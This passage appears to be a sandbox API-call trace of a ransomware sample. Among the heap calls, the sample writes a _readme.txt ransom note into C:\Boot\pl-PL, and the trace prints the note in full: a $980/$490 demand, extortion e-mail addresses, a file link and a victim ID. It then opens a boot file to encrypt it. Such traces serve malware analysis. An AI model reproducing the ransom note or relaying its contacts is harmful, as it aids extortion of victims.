1 [0184.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.092] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0184.092] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.092] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.092] PathFindFileNameW (pszPath="") returned="" [0184.092] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.093] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.093] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.093] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.094] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0184.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.094] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0184.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.094] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.094] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.094] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.096] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.096] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.097] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.097] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0184.097] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.098] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.098] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.098] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.098] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.105] RtlAllocateHeap 